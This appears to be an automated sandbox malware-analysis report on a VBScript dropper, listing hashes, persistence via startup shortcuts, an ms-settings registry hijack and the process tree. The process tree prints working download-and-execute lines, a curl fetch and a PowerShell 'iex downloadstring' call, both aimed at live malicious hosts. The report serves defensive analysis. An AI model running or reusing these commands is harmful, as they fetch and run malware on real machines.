Analysis
-
max time kernel
17s -
max time network
18s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19/11/2024, 18:25
Static task
static1
Behavioral task
behavioral1
Sample
ldvb.vbs
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ldvb.vbs
Resource
win10v2004-20241007-en
General
-
Target
ldvb.vbs
-
Size
1KB
-
MD5
eefbb9e4a9fd600d019cac1535868014
-
SHA1
d24a2c0f2b6732bfe9de1c48e4ae6e11242948aa
-
SHA256
9e06d175c76b3457bba2b4fbd688edcab82a5a55cff9be746d8fefbb0b637ab4
-
SHA512
22537357f3436cfb20c97f05cc86a6b563783416a808323d6228bc7ee1c16a47ac6ee311014cdb2435d3b60e110dcbd1ff3781ae590f25a175f8d941fee84e72
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 24 3396 powershell.exe 25 3396 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 5 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_xbykfm3_U.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_xbykfm3_UEX.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_xbykfm3_UAT.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_xbykfm3_UAA.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_xbykfm3_Uy.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\Shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\Shell\Open powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\_xbykfm3_U\\_xbykfm3_Ui7.exe" powershell.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\ms-settings\Shell\Open\command powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3396 powershell.exe 3396 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3396 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4204 wrote to memory of 4620 4204 WScript.exe 83 PID 4204 wrote to memory of 4620 4204 WScript.exe 83 PID 4204 wrote to memory of 1624 4204 WScript.exe 88 PID 4204 wrote to memory of 1624 4204 WScript.exe 88 PID 1624 wrote to memory of 4976 1624 cmd.exe 90 PID 1624 wrote to memory of 4976 1624 cmd.exe 90 PID 1624 wrote to memory of 3396 1624 cmd.exe 91 PID 1624 wrote to memory of 3396 1624 cmd.exe 91
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ldvb.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\System32\curl.exe"C:\Windows\System32\curl.exe" -o "C:\Wins32Update_\up.cmd" "https://firebasestorage.googleapis.com/v0/b/ola445.appspot.com/o/bt?alt=media&token=a5082314-a2a5-435c-8ef5-198776034a00"2⤵PID:4620
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Wins32Update_\up.cmd" "2⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://contablebar.shop/ll2310/at3') "3⤵PID:4976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -win 13⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3396
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
297B
MD5bb038fac811eadd2416418a256332a6c
SHA1866257dcca41e019648a672c1f5e4be614c8aff4
SHA2560aa85b2f36b77769772af83631079dbfed38d08502e1a60ae9d1a2dfffef8057
SHA512ce40dd989e6e294f92fe1dced8cbb607e87c27bb5c5f8d61b1fe272a2b4a2540f3a9bcfaa36e9ec20093d2654bef78422624352ee0ab28e13a2d5c30369818d3
-
Filesize
463B
MD541eba80cb324d07670a3b61881535430
SHA1748ba6f8572aff7e8e443013c1f0b252e76a24c5
SHA25683fa1393c1facdd3cc103be13f25a289ef56b94fd2d3d4cadb83461d76745188
SHA512c7da58a768c9e7da2980bc23709bcb2a1bcaa4d50cc3e8894469f36ff0888341ce446f2c35950b5bb8fc06431279b9b58c53d01a90d524b126be5c1e80e630b1